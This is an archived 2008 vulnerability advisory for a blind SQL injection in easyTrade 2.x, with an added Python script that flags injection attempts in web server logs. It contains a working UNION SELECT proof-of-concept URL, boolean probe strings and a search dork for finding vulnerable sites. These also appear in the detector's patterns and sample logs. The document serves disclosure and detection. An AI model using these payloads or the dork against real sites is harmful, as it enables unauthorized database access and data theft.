Vendor: easyTrade
By: h0yt3r
CVSS: 7.5 (HIGH)
SQL Injection
CWE: 89
Product Name: easyTrade
Affected Version From: 2.x
Affected Version To: 2.x
Patch Exists: NO
Related CWE: N/A
CPE: 2.6:a:easytrade:easytrade:2.x
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

easyTrade v2.x SQL Injection Vulnerability

The script does not correctly verify the detail id variable, which is used in SQL queries. An attacker can easily get sensitive information from the database by injecting unexpected SQL queries.

No SQL errors are returned when the injected query evaluates to false, so the result has to be read from changes in the page content. Compare the responses for AND 1=1 and AND 1=0.

SQL Injection: http://[target]/[path]/detail.php?id=[SQL]

PoC: detail.php?id=-1%20union%20select%20USER(),2,3,4,5,@@VERSION,7,8,9,10,11,12,13,database(),15,16

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
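
Until the id parameter is validated in the application, requests that carry a non-integer id to detail.php can be found in the web server access log. The following is an added example, not part of the original advisory or of easyTrade: it assumes a combined-format access log and that legitimate id values are plain non-negative integers; the log lines, paths, and the function names `classify_id` and `scan` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (paths, IPs and sizes are made up for the example).
SAMPLE_LOG = """\
198.51.100.7 - - [17/Jun/2008:10:00:01 +0000] "GET /shop/detail.php?id=42 HTTP/1.1" 200 5120
198.51.100.9 - - [17/Jun/2008:10:00:05 +0000] "GET /shop/detail.php?id=42%20AND%201=1 HTTP/1.1" 200 5120
198.51.100.9 - - [17/Jun/2008:10:00:06 +0000] "GET /shop/detail.php?id=42%20AND%201=0 HTTP/1.1" 200 1480
198.51.100.9 - - [17/Jun/2008:10:00:09 +0000] "GET /shop/detail.php?id=-1%20union%20select%20USER(),2,3 HTTP/1.1" 200 2210
198.51.100.7 - - [17/Jun/2008:10:00:12 +0000] "GET /shop/index.php?id=abc HTTP/1.1" 200 900
"""

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) (\d+|-)')
UNION = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)
BOOLEAN = re.compile(r"\b(?:and|or)\b\s+\d+\s*=\s*\d+", re.I)

def classify_id(value):
    """Return None for a plain non-negative integer id, else a finding label."""
    if value.isascii() and value.isdigit():
        return None
    if UNION.search(value):
        return "union-select"
    if BOOLEAN.search(value):
        return "boolean-probe"
    return "non-integer-id"

def scan(log_text, script="detail.php"):
    """Return (client, status, size, label, decoded id) for suspicious requests."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status, size = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes values; keep_blank_values also catches "id=".
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            label = classify_id(value)
            if label:
                findings.append((client, int(status), size, label, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The response size is kept in each finding because the advisory notes that a false condition shows up only as changed page content; a pair of boolean probes from one client with different sizes is worth a closer look.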
Source

Exploit-DB raw data:

######################
#
#easyTrade v2.x SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: "powered by easytrade"
#
##
###
##
#
#Script suffers from a not correctly verified detail id variable which is used in SQL Queries.
#An Attacker can easily get sensitive information from the database by
#injecting unexpected SQL Queries.
#
#We don't get any SQL Errors when the Injection Query appears to be false.
#However we have to look for content changing when we inject.
#Look at AND 1=1/AND 1=0
#
#SQL Injection:
#http://[target]/[path]/detail.php?id=[SQL]
#
#PoC:
#detail.php?id=-1%20union%20select%20USER(),2,3,4,5,@@VERSION,7,8,9,10,11,12,13,database(),15,16
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
#
#######################
####################### 

# milw0rm.com [2008-06-17]